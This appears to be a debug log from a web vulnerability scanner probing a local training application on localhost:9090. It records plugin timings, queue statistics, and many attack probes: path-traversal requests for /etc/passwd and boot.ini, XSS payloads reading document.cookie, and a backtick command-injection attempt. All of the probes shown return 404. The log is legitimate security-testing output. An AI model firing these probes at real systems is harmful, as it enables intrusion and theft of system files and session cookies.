debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4365. [Wed Feb 12 10:04:26 2020 - debug] localhost:9090 connection pool stats (free:106 / in_use:4 / max:50 / total:110) [Wed Feb 12 10:04:26 2020 - debug] Connections with more in use time: (6bfd72a4a3ceaa0d, 0.07 sec) (49303da565ef873b, 0.06 sec) (f68474ff126c8504, 0.05 sec) (872ee7d98f5906e9, 0.05 sec) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4366. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4367. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/viewpage.php?file=/etc/passwd returned HTTP code "404" (id=22837,from_cache=0,grep=1,rtt=0.13,did=2YFbDZQ8) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/login.pl?course_id=\\"><=<=&SCRIPT=>=>=&alert(\'Vulnerable\')=&/SCRIPT= returned HTTP code "404" (id=22834,from_cache=0,grep=1,rtt=0.15,did=qffeZWVa) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd\x00 returned HTTP code "404" (id=22838,from_cache=0,grep=1,rtt=0.08,did=tDH6stiz) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/search/index.cfm?= returned HTTP code "404" (id=22839,from_cache=0,grep=1,rtt=0.10,did=Qd7Skwqd) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0 returned HTTP code "404" (id=22835,from_cache=0,grep=1,rtt=0.08,did=SWMMiHyh) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4368. [Wed Feb 12 10:04:26 2020 - debug] symfony.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/ssi/../../../../../../../etc/passwd returned HTTP code "404" (id=22836,from_cache=0,grep=1,rtt=0.15,did=aTUTElvs) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4369. [Wed Feb 12 10:04:26 2020 - debug] expect_ct.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] motw.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] svn_users.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] private_ip.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] file_upload.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4370. [Wed Feb 12 10:04:26 2020 - debug] meta_generator.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] retirejs.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] serialized_object.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] blank_body.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] credit_cards.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] websockets_links.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] csp.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] dom_xss.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] vulners_db.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] keys.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] clamav.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] objects.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] error_500.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] meta_tags.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] password_profiling.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] click_jacking.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] lang.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] strange_reason.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] cache_control.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] strange_headers.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] ssn.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] oracle.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] feeds.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.00s to run [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/ISSamples/sqlqhit.asp returned HTTP code "404" (id=22841,from_cache=0,grep=1,rtt=0.13,did=0trF65fo) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/modules/Forums/bb_smilies.php?Default_Theme= returned HTTP code "404" (id=22843,from_cache=0,grep=1,rtt=0.10,did=mNeTOFWG) [Wed Feb 12 10:04:26 2020 - debug] HEAD http://localhost:9090/WebAdmin.dll?View=Logon returned HTTP code "404" (id=22842,from_cache=0,grep=1,rtt=0.05,did=K646xcL9) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4371. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/profiles.php?uid=<=<=&script=>=>=&alert(document.cookie)=&/script= returned HTTP code "404" (id=22840,from_cache=0,grep=1,rtt=0.10,did=kiBJPIK7) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=22844,from_cache=1,grep=1,rtt=0.09,did=7R4fz0Yr) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/users.php?mode=profile&uid=<=<=&script=>=>=&alert(document.cookie)=&/script= returned HTTP code "404" (id=22845,from_cache=0,grep=1,rtt=0.03,did=lJK9AgbA) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/etc/hosts returned HTTP code "404" (id=22847,from_cache=0,grep=1,rtt=0.08,did=WLa8Vw0X) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/scripts/db4web_c.exe/dbdirname/c:\\boot.ini returned HTTP code "404" (id=22846,from_cache=0,grep=1,rtt=0.09,did=pgIOvYOL) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/index.php?file=Liens&op=\\">= returned HTTP code "404" (id=22848,from_cache=0,grep=1,rtt=0.11,did=KRY6AZ57) [Wed Feb 12 10:04:26 2020 - debug] url_session.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.10s to run [Wed Feb 12 10:04:26 2020 - debug] error_pages.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.11s to run [Wed Feb 12 10:04:26 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/svc/paymentsuccessful.php3") took 0.12s to run [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/phpBB2/search.php?search_id=1\\\\ returned HTTP code "404" (id=22851,from_cache=0,grep=1,rtt=0.07,did=OWwuppDj) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/add_user.php returned HTTP code "404" (id=22853,from_cache=0,grep=1,rtt=0.10,did=yrDWsRdB) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4372. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms==&Where=&Sort=Photo&Dir= returned HTTP code "404" (id=22849,from_cache=0,grep=1,rtt=0.15,did=dDn9qgjl) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd returned HTTP code "404" (id=22855,from_cache=0,grep=1,rtt=0.05,did=iWtAbVAy) [Wed Feb 12 10:04:26 2020 - debug] web_spider.discover(did="8FTaqqFG",uri="http://localhost:9090/") took 1.38s to run [Wed Feb 12 10:04:26 2020 - debug] server_header.discover(http://localhost:9090/learn/vulnerability/a7_xss, did=DYQzVu8y) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script| returned HTTP code "404" (id=22854,from_cache=0,grep=1,rtt=0.10,did=y9UEEqg2) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/phpwebchat/register.php?register=yes&username=OverG&email=&email1= returned HTTP code "404" (id=22852,from_cache=0,grep=1,rtt=0.15,did=1W4a3XEZ) [Wed Feb 12 10:04:26 2020 - debug] localhost:9090 connection pool stats (free:108 / in_use:3 / max:50 / total:111) [Wed Feb 12 10:04:26 2020 - debug] Connections with more in use time: (eacfb106b12a40d5, 0.10 sec) (bfbfe4de64ee73f0, 0.02 sec) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4373. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/megabook/admin.cgi?login= returned HTTP code "404" (id=22850,from_cache=0,grep=1,rtt=0.09,did=ATbFHMRf) [Wed Feb 12 10:04:26 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11658, 'reject-seen-url': 5576, 'reject-out-of-scope': 215, 'accept': 4776} [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/admin/sh_taskframes.asp?Title=Configuraci\xc3\xb3n de registro Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer&tab2=TabsWebLogSettings&__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=\\"> returned HTTP code "404" (id=22857,from_cache=0,grep=1,rtt=0.17,did=OcxOWACd) [Wed Feb 12 10:04:26 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11658, 'reject-seen-url': 5576, 'reject-out-of-scope': 215, 'accept': 4776} [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4374. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/servlet/MsgPage?action=test&msg= returned HTTP code "404" (id=22856,from_cache=0,grep=1,rtt=0.06,did=3xW2jyVc) [Wed Feb 12 10:04:26 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11658, 'reject-seen-url': 5576, 'reject-out-of-scope': 215, 'accept': 4776} [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4375. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd returned HTTP code "404" (id=22858,from_cache=0,grep=1,rtt=0.22,did=tjUy2ePA) [Wed Feb 12 10:04:26 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11658, 'reject-seen-url': 5576, 'reject-out-of-scope': 215, 'accept': 4776} [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/supporter/index.php?t=tickettime&id=<=<=&script=>=>=&=&/script= returned HTTP code "404" (id=22859,from_cache=0,grep=1,rtt=0.16,did=vEI0eU7D) [Wed Feb 12 10:04:26 2020 - debug] HEAD http://localhost:9090/ariadne/ returned HTTP code "404" (id=22861,from_cache=0,grep=1,rtt=0.20,did=RvzfDhwa) [Wed Feb 12 10:04:26 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11658, 'reject-seen-url': 5576, 'reject-out-of-scope': 215, 'accept': 4776} [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd\x00.html returned HTTP code "404" (id=22862,from_cache=0,grep=1,rtt=0.11,did=HKOrrcbR) [Wed Feb 12 10:04:26 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11658, 'reject-seen-url': 5576, 'reject-out-of-scope': 215, 'accept': 4776} [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/phprocketaddin/?page=../../../../../../../../../../boot.ini returned HTTP code "404" (id=22864,from_cache=0,grep=1,rtt=0.03,did=tlRJZmbN) [Wed Feb 12 10:04:26 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11658, 'reject-seen-url': 5576, 'reject-out-of-scope': 215, 'accept': 4776} [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd returned HTTP code "404" (id=22866,from_cache=0,grep=1,rtt=0.05,did=GBhQCy5F) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/[SecCheck]/../../ext.ini returned HTTP code "404" (id=22867,from_cache=0,grep=1,rtt=0.13,did=cmtOxdXB) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4376. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/comment.php?mode=Delete&sid=1&cid=<=<=&script=>=>=&alert(document.cookie)=&/script= returned HTTP code "404" (id=22865,from_cache=0,grep=1,rtt=0.07,did=crCSNnz1) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1 returned HTTP code "404" (id=22860,from_cache=0,grep=1,rtt=0.18,did=LVWMfnzP) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/htsearch?exclude=`/etc/passwd` returned HTTP code "404" (id=22863,from_cache=0,grep=1,rtt=0.24,did=s7Nymyyn) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4377. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1 returned HTTP code "404" (id=22868,from_cache=0,grep=1,rtt=0.15,did=eoSjIbOZ) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/userinfo.php?uid=1 returned HTTP code "404" (id=22869,from_cache=0,grep=1,rtt=0.10,did=dS1dUlKS) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2114. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4378. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2115. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4379. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2116. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/modules/Forums/bb_smilies.php?bgcolor1=\\"> returned HTTP code "404" (id=22873,from_cache=0,grep=1,rtt=0.09,did=r6WABkAw) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/postnuke/html/modules.php?op=modload&name=News&file=article&sid== returned HTTP code "404" (id=22872,from_cache=0,grep=1,rtt=0.10,did=0O4PvaqB) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4380. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/htsearch.cgi?words="> returned HTTP code "404" (id=22870,from_cache=0,grep=1,rtt=0.10,did=gGHS3RK6) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/index.php?catid=<=<=&script=>=>=&alert(\'Vulnerable\')=&/script= returned HTTP code "404" (id=22871,from_cache=0,grep=1,rtt=0.03,did=8q4HvXt9) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2117. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4381. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/friend.php?op=SiteSent&fname= returned HTTP code "404" (id=22874,from_cache=0,grep=1,rtt=0.01,did=d7qmoh85) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/mt-static/mt.cfg returned HTTP code "404" (id=22877,from_cache=0,grep=1,rtt=0.04,did=bfbGu30n) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/q0KvOot8go returned HTTP code "404" (id=22878,from_cache=0,grep=1,rtt=0.08,did=8rXkfGpv) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/.../boot.ini returned HTTP code "404" (id=22879,from_cache=0,grep=1,rtt=0.05,did=1NAPcAdw) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/modules.php?name=Your_Account&op=userinfo&username=bla returned HTTP code "404" (id=22880,from_cache=0,grep=1,rtt=0.06,did=QQHfD3nB) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/../../../../../../../etc/passwd returned HTTP code "404" (id=22881,from_cache=0,grep=1,rtt=0.05,did=uj8YfI5e) [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/weblogic returned HTTP code "404" (id=22800,from_cache=0,grep=1,rtt=0.09,did=gzofyk8h) [Wed Feb 12 10:04:26 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11672, 'reject-seen-url': 5576, 'reject-out-of-scope': 215, 'accept': 4787} [Wed Feb 12 10:04:26 2020 - debug] HEAD http://localhost:9090/cgi-bin/Pbcgi.exe returned HTTP code "404" (id=22876,from_cache=0,grep=1,rtt=0.06,did=W6IsINFP) [Wed Feb 12 10:04:26 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11672, 'reject-seen-url': 5576, 'reject-out-of-scope': 215, 'accept': 4787} [Wed Feb 12 10:04:26 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/usercp.php?function=avataroptions:javascript:alert(\'Vulnerable\') returned HTTP code "404" (id=22875,from_cache=0,grep=1,rtt=0.05,did=sejF9wHt) [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2118. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4382. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2119. [Wed Feb 12 10:04:26 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4383. [Wed Feb 12 10:04:26 2020 - debug] GET http://localhost:9090/cgi-bin/shop.cgi?page=../../../../../../../etc/passwd returned HTTP code "404" (id=22882,from_cache=0,grep=1,rtt=0.05,did=JVLADpXY) [Wed Feb 12 10:04:26 2020 - debug] localhost:9090 connection pool stats (free:108 / in_use:3 / max:50 / total:111) [Wed Feb 12 10:04:27 2020 - debug] Connections with more in use time: (f68474ff126c8504, 0.05 sec) (bfbfe4de64ee73f0, 0.05 sec) (4e202fd8da57d411, 0.01 sec) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/learn/vulnerability/a7_xss returned HTTP code "200" (id=22886,from_cache=1,grep=1,rtt=0.19,did=NUhNRMYj) [Wed Feb 12 10:04:27 2020 - debug] server_header.discover(did="DYQzVu8y",uri="http://localhost:9090/learn/vulnerability/a7_xss") took 0.50s to run [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4384. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/clusterframe.jsp?cluster= returned HTTP code "404" (id=22884,from_cache=0,grep=1,rtt=0.05,did=Rp2ZOF0b) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2120. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/supporter/index.php?t=ticketfiles&id=<=<=&script=>=>=&=&/script= returned HTTP code "404" (id=22885,from_cache=0,grep=1,rtt=0.10,did=1spvTnvG) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cbms/cbmsfoot.php returned HTTP code "404" (id=22883,from_cache=0,grep=1,rtt=0.07,did=VpU0alRj) [Wed Feb 12 10:04:27 2020 - debug] wordpress_fingerprint.discover(http://localhost:9090/learn/vulnerability/a7_xss, did=kS618ucL) [Wed Feb 12 10:04:27 2020 - debug] [wordpress_fingerprint] Crawling "http://localhost:9090/learn/vulnerability/a7_xss" [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4385. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4385. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4385. [Wed Feb 12 10:04:27 2020 - debug] mx_injection.audit(did="OHWDD5OZ",uri="http://localhost:9090/learn/vulnerability/a2_broken_auth") took 2.01s to run [Wed Feb 12 10:04:27 2020 - debug] generic.audit(did="44qdlu35", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:27 2020 - debug] response_splitting.audit(did="IA1Ax2dn",uri="http://localhost:9090/learn/vulnerability/a2_broken_auth") took 2.01s to run [Wed Feb 12 10:04:27 2020 - debug] format_string.audit(did="W59M80Jk", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:27 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:W59M80Jk) [Wed Feb 12 10:04:27 2020 - debug] rfi.audit(did="E53sjBpj",uri="http://localhost:9090/learn/vulnerability/a2_broken_auth") took 2.01s to run [Wed Feb 12 10:04:27 2020 - debug] websocket_hijacking.audit(did="2hDCYUIP", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] deserialization.audit(did="ZRKVOBSF",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 2.00s to run [Wed Feb 12 10:04:27 2020 - debug] shell_shock.audit(did="hEfZumL4", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:27 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:27 2020 - debug] lfi.audit(did="pHFtiEnA",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 1.88s to run [Wed Feb 12 10:04:27 2020 - debug] memcachei.audit(did="ECfHhDR1", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:27 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:ECfHhDR1) [Wed Feb 12 10:04:27 2020 - debug] eval.audit(did="edJ1CWod",uri="http://localhost:9090/learn/vulnerability/a2_broken_auth") took 286.77s to run [Wed Feb 12 10:04:27 2020 - debug] un_ssl.audit(did="xwQ0rB8z", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] un_ssl.audit(did="xwQ0rB8z",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] ldapi.audit(did="GEVb8vJP", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] 